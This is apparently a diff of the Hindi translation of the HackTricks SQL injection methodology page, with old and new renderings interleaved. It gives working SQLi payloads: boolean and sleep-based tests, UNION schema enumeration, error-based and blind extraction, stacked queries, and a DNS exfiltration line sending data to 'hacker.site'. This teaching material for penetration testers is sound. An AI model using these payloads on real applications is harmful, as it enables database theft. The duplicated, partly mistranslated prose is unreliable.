<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **या** मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके।
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, **The PEASS Family** की खोज करें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PRs सबमिट करके।
</details>

View file

@ -4,28 +4,28 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित** किया जाए? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह देखें
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित** किया जाए? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**।
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके**
</details>
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) स्पेन में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और यूरोप में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उफान मिलने का समारोह है।
[**RootedCON**](https://www.rootedcon.com/) **स्पेन** में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और **यूरोप** में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह सम्मेलन प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उबाऊ मिलन स्थल है।
{% embed url="https://www.rootedcon.com/" %}
## SQL Injection क्या है?
## SQL injection क्या है?
**SQL इंजेक्शन** एक सुरक्षा दोष है जो हमलावदियों को एक एप्लिकेशन के डेटाबेस क्वेरी में **हस्तक्षेप करने** की अनुमति देता है। यह कमजोरी हमलावदियों को अनुमति देती है कि वे उन डेटा को **देखें**, **संशोधित करें**, या **हटाएं** जिनका उन्हें पहुंचना नहीं चाहिए, जिसमें अन्य उपयोगकर्ताओं की जानकारी या ऐसे किसी भी डेटा शामिल हो सकता है जिसका एप्लिकेशन उपयोग कर सकता है। ऐसे कार्रवाई एप्लिकेशन के कार्यान्वयन या सामग्री में स्थायी परिवर्तन या सर्वर का संक्रमण या सेवा की नकारात्मक परिणाम में भी हो सकती है।
**SQL injection** एक सुरक्षा दोष है जो हमलावधारकों को एक एप्लिकेशन के डेटाबेस क्वेरी में **हस्तक्षेप करने** की अनुमति देता है। यह कमजोरी हमलावधारकों को अनुमति देती है कि वे उन डेटा को **देखें**, **संशोधित करें**, या **हटाएं** जिनका उन्हें पहुंचना नहीं चाहिए, जिसमें अन्य उपयोगकर्ताओं की जानकारी या ऐसे किसी भी डेटा शामिल हो सकता है जिसका एप्लिकेशन पहुंच सकता है। ऐसे कार्रवाई एप्लिकेशन के कार्यान्वयन या सामग्री में स्थायी परिवर्तन या सर्वर का संक्रमण या सेवा की नापसंदी का परिणाम हो सकता है।
## प्रवेश बिंदु का पता लगाना
जब एक साइट **SQL इंजेक्शन (SQLi)** के लिए वंशावली होने के लिए असामान्य सर्वर प्रतिक्रियाएं दिखाती है, तो **पहला कदम** यह है कि बिना इसे व्यवस्थित करने के **क्वेरी में डेटा इंजेक्ट करने का तरीका समझें**। इसके लिए मौजूदा संदर्भ से **निकलने का तरीका** पहचानना आवश्यक है। ये कुछ उपयोगी उदाहरण हैं:
जब एक साइट **SQL injection (SQLi)** के लिए **वंशावली** दिखाती है क्योंकि असामान्य सर्वर प्रतिक्रियाएँ SQLi संबंधित इनपुट्स के लिए, **पहला कदम** यह है कि समझें कि वर्तमान संदर्भ से डेटा कैसे **क्वेरी में डाला जा सकता है बिना इसे बिगाड़े**। इसके लिए वर्तमान संदर्भ से **निकलने की विधि** को पहचानना आवश्यक है। ये कुछ उपयोगी उदाहरण हैं:
```
[Nothing]
'
@ -38,7 +38,7 @@
"))
`))
```
तो, आपको यह जानना चाहिए कि **क्वेरी में त्रुटियाँ न हों**। क्वेरी को ठीक करने के लिए आप **डेटा इनपुट** कर सकते हैं ताकि **पिछली क्वेरी नए डेटा को स्वीकार करे**, या फिर आप अपने डेटा को **इनपुट** कर सकते हैं और **एक कमेंट सिम्बल को अंत में जोड़ सकते हैं**।
तो, आपको यह जानना चाहिए कि **क्वेरी में त्रुटियाँ न हों**। क्वेरी को ठीक करने के लिए आप **इनपुट** डेटा दे सकते हैं ताकि **पिछली क्वेरी नए डेटा को स्वीकार करे**, या फिर आप अपने डेटा को **इनपुट** कर सकते हैं और **एक टिप्पणी प्रतीक को अंत में जोड़ सकते हैं**।
_ध्यान दें कि अगर आप त्रुटि संदेश देख सकते हैं या जब क्वेरी काम कर रही है और जब नहीं तो इस चरण को अधिक आसान होगा।_
@ -68,11 +68,11 @@ SQLite
HQL
HQL does not support comments
```
### तार्किक परिचय की पुष्टि
### तार्किक परिचय करना
एक SQL इन्जेक्शन संवेदनशीलता की पुष्टि करने का एक विश्वसनीय तरीका **तार्किक कार्य** को क्रियान्वित करना है और अपेक्षित परिणामों का अवलोकन करना। उदाहरण के लिए, एक GET पैरामीटर जैसे `?username=Peter` जब `?username=Peter' या '1'='1` में संशोधित किया जाता है और वास्तविक सामग्री उत्पन्न होती है, तो यह एक SQL इन्जेक्शन संवेदनशीलता का संकेत है।
एक SQL इन्जेक्शन व्यवस्थितता की पुष्टि करने के लिए एक **तार्किक कार्य** को निष्पादित करके अपेक्षित परिणामों का अवलोकन करने क एक विश्वसनीय तरीका है। उदाहरण के लिए, एक GET पैरामीटर जैसे `?username=Peter` जब `?username=Peter' या '1'='1` में संशोधित किया जाता है और यह एक ही सामग्री प्रदान करता है, तो यह एक SQL इन्जेक्शन व्यवस्थितता का संकेत है।
सी तरह, **गणितीय कार्यों** का अनुप्रयोग एक प्रभावी पुष्टि तकनीक के रूप में काम करता है। उदाहरण के लिए, यदि `?id=1` और `?id=2-1` तक पहुँचने पर समान परिणाम प्राप्त होता है, तो यह SQL इन्जेक्शन का संकेत है।
सी तरह, **गणितीय कार्यों** का अनुप्रयोग एक प्रभावी पुष्टि तकनीक के रूप में काम करता है। उदाहरण के लिए, अगर `?id=1` और `?id=2-1` तक पहुँचने पर समान परिणाम प्रकट होते हैं, तो यह SQL इन्जेक्शन का संकेत है।
तार्किक कार्य की पुष्टि करने वाले उदाहरण:
```
@ -81,14 +81,14 @@ page.asp?id=1' or 1=1 -- results in true
page.asp?id=1" or 1=1 -- results in true
page.asp?id=1 and 1=2 -- results in false
```
यह शब्द-सूची निम्नलिखित तरीके से **SQL इंजेक्शन की पुष्टि** करने के लिए बनाई गई थी:
यह शब्द-सूची बनाई गई थी ताकि प्रस्तावित तरीके से **SQL इन्जेक्शन की पुष्टि** की जा सके:
{% file src="../../.gitbook/assets/sqli-logic.txt" %}
### समय की पुष्टि करना
कुछ मामलों में आपको यह नहीं पता चलेगा कि आप जिस पृष्ठ का परीक्षण कर रहे हैं, उस पर कोई भी परिवर्तन हुआ है। इसलिए, **ब्लाइंड SQL इंजेक्शन** का पता लगाने का एक अच्छा तरीका है कि डेटाबेस को कार्रवाई करने के लिए बनाए जाएंगे और पृष्ठ को लोड करने में समय पर **प्रभाव होगा**।\
इसलिए, हम SQL क्वेरी में एक ऑपरेशन को जो पूरा होने में बहुत समय लेगा, जोड़ने जा रहे हैं:
कुछ मामलों में आपको यह नहीं पता चलेगा कि आप जिस पृष्ठ का परीक्षण कर रहे हैं, उसमें कोई परिवर्तन हुआ है। इसलिए, **ब्लाइंड SQL इन्जेक्शन का पता लगाने** का एक अच्छा तरीका है कि डेटाबेस को कार्रवाई करने के लिए बनाए और पृष्ठ को लोड करने में समय का **प्रभाव होगा**।\
इसलिए, हम SQL क्वेरी में एक ऑपरेशन को जोड़ने जा रहे हैं जो पूरा होने में बहुत समय लेगा:
```
MySQL (string concat and logical ops)
1' + sleep(10)
@ -110,11 +110,11 @@ SQLite
1' AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
1' AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
```
कई मामलों में **नींद फ़ंक्शनों की अनुमति नहीं होगी**। तब, इन फ़ंक्शनों का उपयोग करने की बजाय आप क्वेरी को **जटिल कार्य** करने के लिए कर सकते हैं जो कई सेकंड लेगा। _इन तकनीकों के उदाहरणों को प्रत्येक प्रौद्योगिकी पर अलग-अलग टिप्पणी किया जाएगा_।
कई मामलों में **नींद फ़ंक्शनों की अनुमति नहीं होगी**। तब, इन फ़ंक्शनों का उपयोग करने की बजाय आप क्वेरी को **जटिल कार्य** करने के लिए कर सकते हैं जो कई सेकंड लेगा। _इन तकनीकों के उदाहरणों को अलग-अलग प्रौद्योगिकियों पर टिप्पणी के रूप में दिया जाएगा।_
### पीछे-एंड की पहचान
### बैक-एंड की पहचान
पीछे-एंड की पहचान करने का सबसे अच्छा तरीका विभिन्न पीछे-एंड के फ़ंक्शनों को क्रियान्वित करने की कोशिश करना है। आप पिछले खंड के _**नींद**_ **फ़ंक्शन** या इन्हें उपयोग कर सकते हैं (टेबल [payloadsallthethings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#dbms-identification) से):
बैक-एंड की पहचान करने का सबसे अच्छा तरीका विभिन्न बैक-एंड के फ़ंक्शनों को क्रियान्वित करने की कोशिश करना है। आप पिछले खंड के _**नींद**_ **फ़ंक्शन** या इन्हें उपयोग कर सकते हैं (टेबल [payloadsallthethings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#dbms-identification) से):
```bash
["conv('a',16,2)=conv('a',16,2)" ,"MYSQL"],
["connection_id()=connection_id()" ,"MYSQL"],
@ -145,24 +145,24 @@ SQLite
यदि आपके पास क्वेरी के आउटपुट तक पहुंच है, तो आप डेटाबेस के संस्करण को प्रिंट कर सकते हैं।
{% hint style="info" %}
एक सततीकरण के लिए हम विभिन्न प्रकार की SQL Injection को शादीशुदा करने के विभिन्न तरीकों पर चर्चा करेंगे। हम MySQL का उदाहरण लेंगे।
एक सतति जिसमें हम विभिन्न प्रकार की SQL Injection का उपयोग करने के विभिन्न तरीके पर चर्चा करेंगे। हम MySQL का उदाहरण लेंगे।
{% endhint %}
### पोर्टस्विगर के साथ पहचान
{% embed url="https://portswigger.net/web-security/sql-injection/cheat-sheet" %}
## यूनियन आधारित शादीशुदा
## Union Based का शोधन
### स्तंभों की संख्या का पता लगाना
यदि आप क्वेरी के आउटपुट देख सकते हैं तो इसे शादीशुदा करने का सबसे अच्छा तरीका है।\
सबसे पहले, हमें यह जानना है कि **प्रारंभिक अनुरोध** कितने **स्तंभ** लौटा रहा है। यह इसलिए है कि **दोनों क्वेरी को समान संख्या में स्तंभ लौटाना चाहिए**।\
इस उद्देश्य के लिए आम तौर पर दो विधियां प्रयोग की जाती हैं:
यदि आप क्वेरी के आउटपुट देख सकते हैं तो इसे उसका शोधन करने का सबसे अच्छा तरीका है।\
सबसे पहले, हमें यह जानने की आवश्यकता है कि **प्रारंभिक अनुरोध** कितने **स्तंभ** वापस कर रहा है। यह इसलिए है क्योंकि **दोनों क्वेरी कोलम्न की संख्या वापस करनी चाहिए**।\
इस उद्देश्य के लिए दो विधियां सामान्यत: उपयोग की जाती हैं:
#### क्रम/समूह द्वारा
क्वेरी में स्तंभों की संख्या निर्धारित करने के लिए, **ORDER BY** या **GROUP BY** शर्तों में उपयोग किए गए संख्या को धारात्मक रूप से समायोजित करें जब तक एक गलत प्रतिक्रिया प्राप्त न हो जाए। SQL के भीतर **GROUP BY** और **ORDER BY**ी विशिष्ट कार्यक्षमताओं के बावजूद, दोनों क्वेरी के स्तंभों की संख्या का निर्धारण करने के लिए इस्तेमाल किया जा सकता है।
क्वेरी में स्तंभों की संख्या निर्धारित करने के लिए, **ORDER BY** या **GROUP BY** शर्तों में उपयोग किए गए संख्या को धारात्मक रूप से समायोजित करें जब तक एक गलत प्रतिक्रिया प्राप्त न हो जाए। SQL के भीतर **GROUP BY** और **ORDER BY**े विभिन्न कार्यों के बावजूद, दोनों क्वेरी के स्तंभों की संख्या का निर्धारण करने के लिए इनका उपयोग एकसमान रूप से किया जा सकता है।
```sql
1' ORDER BY 1--+ #True
1' ORDER BY 2--+ #True
@ -186,11 +186,11 @@ SQLite
1' UNION SELECT null,null-- - Not working
1' UNION SELECT null,null,null-- - Worked
```
_आपको कई मामलों में `null` मान का उपयोग करना चाहिए क्योंकि कुछ मामलों में क्वेरी के दोनों ओर कॉलम का प्रकार समान होना चाहिए और हर मामले में `null` मान मान्य है।_
_आपको कई मामलों में `null` मान का उपयोग करना चाहिए क्योंकि कुछ मामलों में क्वेरी के दोनों ओर की स्तंभों के प्रकार समान होना चाहिए और हर मामले में `null` मान मान्य है।_
### डेटाबेस नाम, तालिका नाम और कॉलम नाम निकालें
### डेटाबेस नाम, तालिका नाम और स्तंभ नामों को निकालें
अगले उदाहरणों में हम सभी डेटाबेस का नाम, एक डेटाबेस की तालिका का नाम, तालिका के कॉलम नाम प्राप्त करेंगे:
अगले उदाहरणों में हम सभी डेटाबेस का नाम, एक डेटाबेस की तालिका का नाम, तालिका के स्तंभ नामों को पुनः प्राप्त करने जा रहे हैं:
```sql
#Database names
-1' UniOn Select 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata
@ -203,51 +203,51 @@ _आपको कई मामलों में `null` मान का उप
```
_हर विभिन्न डेटाबेस पर इस डेटा को खोजने के लिए एक विभिन्न तरीका है, लेकिन यह हमेशा एक ही मेथडोलॉजी होती है।_
## छिपी हयूनियन आधारित शोध
## छिपी हुई यूनियन आधारित शोध
जब क्वेरी का आउटपुट दिखाई देता है, लेकिन एक यूनियन-आधारित इन्जेक्शन संभावनाशून्य लगता है, तो इसका मतलब है कि एक **छिपी यूनियन-आधारित इन्जेक्शन** की मौजूदगी है। यह परिदृश्य अक्सर एक अंधा इन्जेक्शन स्थिति की ओर ले जाता है। एक अंधा इन्जेक्शन को यूनियन-आधारित में बदलने के लिए, बैकएंड पर निष्क्रिय क्वेरी को समझना आवश्यक है।
जब क्वेरी का आउटपुट दिखाई देता है, लेकिन यूनियन आधारित इन्जेक्शन संभावनाशील नहीं लगता है, तो इसका मतलब है कि एक **छिपी हुई यूनियन आधारित इन्जेक्शन** मौजूद है। यह परिदृश्य अक्सर एक अंधा इन्जेक्शन स्थिति की ओर ले जाता है। एक अंधा इन्जेक्शन को यूनियन आधारित में बदलने के लिए, बैकएंड पर निष्क्रिय क्वेरी को समझना आवश्यक है।
इसे आपके लक्ष्य डेटाबेस प्रबंधन सिस्टम (DBMS) के डिफ़ॉल्ट तालिकाओं के साथ अंधा इन्जेक्शन तकनीकों का उपयोग करके प्राप्त किया जा सकता है। इन डिफ़ॉल्ट तालिकाओं को समझने के लिए, लक्ष्य DBMS की दस्तावेज़ीकरण पर परामर्श दिया जाता है।
इसे आपके लक्ष्य डेटाबेस प्रबंधन सिस्टम (DBMS) के डिफ़ॉल्ट तालिकाओं के साथ अंधा इन्जेक्शन तकनीकों का उपयोग करके प्राप्त किया जा सकता है। इन डिफ़ॉल्ट तालिकाओं को समझने के लिए, लक्ष्य DBMS की दस्तावेज़ीकरण पर सलाह दी जाती है।
क्वेरी को निकालने के बाद, मूल क्वेरी को सुरक्षित रूप से बंद करने के लिए अपने पेलोड को अनुकूलित करना आवश्यक है। इसके बाद, अपने पेलोड में एक यूनियन क्वेरी जोड़ी जाती है, जिससे नए पहुंचने वाले यूनियन-आधारित इन्जेक्शन का शोधन सुविधा प्राप्त होती है।
एक बार क्वेरी निकाल ली गई है, मूल क्वेरी को सुरक्षित रूप से बंद करने के लिए अपने पेलोड को अनुकूलित करना आवश्यक है। इसके बाद, अपने पेलोड में एक यूनियन क्वेरी जोड़ी जाती है, जिससे नए पहुंचने वाले यूनियन आधारित इन्जेक्शन का शोषण सुविधा प्रदान की जाती है।
अधिक व्यापक अनुभव के लिए, [हीलिंग ब्लाइंड इन्जेक्शन](https://medium.com/@Rend_/healing-blind-injections-df30b9e0e06f) पर उपलब्ध पूरे लेख का संदर्भ देखें।
अधिक व्यापक अनुभव के लिए, [Healing Blind Injections](https://medium.com/@Rend_/healing-blind-injections-df30b9e0e06f) पर उपलब्ध पूरे लेख का संदर्भ देखें।
## त्रुटि आधारित शोध
यदि किसी कारणवश आप **क्वेरी** का **आउटपुट** नहीं देख सकते हैं, लेकिन आप **त्रुटि संदेश** देख सकते हैं, तो आप इस त्रुटि संदेश का उपयोग करके डेटाबेस से डेटा को **बाहर निकाल** सकते हैं।\
यूनियन आधारित शोधन में एक ही फ्लो का पालन करते हुए आप डेटाबेस को डंप कर सकते हैं।
यूनियन आधारित शोधन में एक ही फ्लो का पालन करते हुए आप डीबी डंप कर सकते हैं।
```sql
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
```
## ब्लाइंड SQLi का शोषण
इस मामले में आप क्वेरी या त्रुटियों के परिणाम नहीं देख सकते हैं, लेकिन आप यह पहचान सकते हैं कि क्वेरी एक सच्चा या एक गलत प्रतिक्रिया वापस करती है क्योंकि पृष्ठ पर विभिन्न सामग्री है।\
इस मामले में, आप उस व्यवहार का दुरुपयोग कर सकते हैं ताकि डेटाबेस को चार चार करने के लिए:
इस मामले में आप क्वेरी के परिणाम या त्रुटियों को नहीं देख सकते हैं, लेकिन आप यह पहचान सकते हैं कि क्वेरी एक सच्चा या एक गलत प्रतिक्रिया कब वापस करती है क्योंकि पृष्ठ पर विभिन्न सामग्री होती है।\
इस मामले में, आप उस व्यवहार का दुरुपयोग कर सकते हैं ताकि डेटाबेस को एक चरित्र से दंप कर सकें:
```sql
?id=1 AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables = 'A'
```
## त्रुटि अंध SQLi का शोषण
## त्रुटि अंधा SQLi का शोधन
यह **पहले जैसा मामला है** लेकिन पूछे गए प्रश्न से सच/झूठ का अंतर करने की बजाय आप एसक्यूएल क्वेरी में त्रुटि का अंतर कर सकते हैं या नहीं (शायद इसलिए क्योंकि एचटीटीपी सर्वर क्रैश हो जाता है)। इसलिए, इस मामले में आप प्रत्येक बार जब आप सही ढंग से अक्षर का अनुमान लगाते हैं तो एसक्यूएल त्रुटि को मजबूर कर सकते हैं:
यह **पहले जैसा मामला है** लेकिन पूछे गए प्रश्न से सच/झूठ का अंतर करने की बजाय आप SQL प्रश्न में त्रुटि का अंतर कर सकते हैं या नहीं (शायद HTTP सर्वर क्रैश हो जाए)। इसलिए, इस मामले में आप प्रत्येक बार सही ढंग से अक्षर का अनुमान लगाते समय एक SQL त्रुटि को मजबूर कर सकते हैं:
```sql
AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -
```
## Time Based SQLi का शोषण
इस मामले में किसी भी तरह से क्वेरी के प्रतिक्रिया को पृष्ठ के संदर्भ पर भिन्न करने का कोई तरीका **नहीं** है। लेकिन, यदि अनुमानित वर्ण सही है तो पृष्ठ को **लोड होने में अधिक समय** लगा सकते हैं। हम पहले ही इस तकनीक का उपयोग करके [एक SQLi सुरक्षा दोष की पुष्टि](./#confirming-with-timing) करने के लिए देख चुके हैं
इस मामले में किसी भी तरह से क्वेरी के प्रतिक्रिया को पृष्ठ के संदर्भ पर भिन्न करने का कोई तरीका नहीं है। लेकिन, यदि अनुमानित वर्ण सही है तो पृष्ठ को लोड करने में अधिक समय लगा सकते हैं। हम पहले ही इस तकनीक का उपयोग करते हुए देख चुके हैं ताकि [एक SQLi vuln की पुष्टि की जा सके](./#confirming-with-timing)
```sql
1 and (select sleep(10) from users where SUBSTR(table_name,1,1) = 'A')#
```
## Stacked Queries
आप स्टैक्ड क्वेरीज़ का उपयोग करके **कई क्वेरीज़ों को लगातार निष्पादित** कर सकते हैं। ध्यान दें कि जब भीतर के क्वेरीज़ निष्पादित होते हैं, **परिणाम** **एप्लिकेशन को वापस नहीं भेजे जाते**। इसलिए यह तकनीक मुख्य रूप से **ब्लाइंड वंशांकन** के संबंध में उपयोगी है जहाँ आप एक दूसरी क्वेरी का उपयोग करके DNS लुकअप, शर्तमुक्त त्रुटि, या समय देरी को ट्रिगर कर सकते हैं।
आप स्टैक्ड क्वेरीज़ का उपयोग करके **कई क्वेरीज़ों को लगातार निष्पादित** कर सकते हैं। ध्यान दें कि जब आगामी क्वेरीज़ निष्पादित होती हैं, तो **परिणाम** **एप्लिकेशन को वापस नहीं भेजे जाते**। इसलिए यह तकनीक मुख्य रूप से **ब्लाइंड वंशावली** के संदर्भ में उपयोगी है जहाँ आप एक दूसरी क्वेरी का उपयोग करके DNS लुकअप, शर्तमुक्त त्रुटि, या समय देरी को ट्रिगर कर सकते हैं।
**Oracle** स्टैक्ड क्वेरीज़ का समर्थन नहीं करता है। **MySQL, Microsoft** और **PostgreSQL** इन्हें समर्थन करते हैं: `QUERY-1-HERE; QUERY-2-HERE`
## Out of band Exploitation
अगर **कोई अन्य** उत्पीड़न विधि **काम नहीं करती** है, तो आप डेटाबेस से जानकारी को आपके द्वारा नियंत्रित बाह्य होस्ट पर भेजने का प्रयास कर सकते हैं। उदाहरण के लिए, DNS क्वेरीज़ के माध्यम से:
अगर **कोई अन्य** उत्पीड़न विधि **काम नहीं करती** है, तो आप डेटाबेस से जानकारी को आपके द्वारा नियंत्रित बाह्य होस्ट पर निकालने का प्रयास कर सकते हैं। उदाहरण के लिए, DNS क्वेरीज़ के माध्यम से:
```sql
select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
```
@ -261,7 +261,7 @@ a' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DO
## तकनीक विशिष्ट जानकारी
हमने पहले ही एक SQL Injection सुरक्षा दोष को शोधन करने के सभी तरीके चर्चा की है। इस पुस्तक में डेटाबेस प्रौद्योगिकी के निर्भर अधिक ट्रिक्स खोजें:
हमने पहले ही एक SQL Injection सुरक्षा दोष को शोधन करने के सभी तरीके की चर्चा की है। इस पुस्तक में डेटाबेस प्रौद्योगिकी पर निर्भर कुछ और ट्रिक्स मिलेंगे:
* [MS Access](ms-access-sql-injection.md)
* [MSSQL](mssql-injection.md)
@ -269,11 +269,11 @@ a' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DO
* [Oracle](oracle-injection.md)
* [PostgreSQL](postgresql-injection/)
या आपको **MySQL, PostgreSQL, Oracle, MSSQL, SQLite और HQL के संबंधित कई ट्रिक्स** मिलेंगे [**https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection**](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)
या आपको **MySQL, PostgreSQL, Oracle, MSSQL, SQLite और HQL के संबंध में बहुत सारी ट्रिक्स** मिलेंगी [**https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection**](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) **स्पेन** में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और **यूरोप** में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह सम्मेलन प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए हर शाखा में एक उत्तेजक मिलन स्थल है।
[**RootedCON**](https://www.rootedcon.com/) **स्पेन** में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और **यूरोप** में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह सम्मेलन प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उत्तेजक मिलन स्थल है।
{% embed url="https://www.rootedcon.com/" %}
@ -289,7 +289,7 @@ a' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DO
```sql
"SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
```
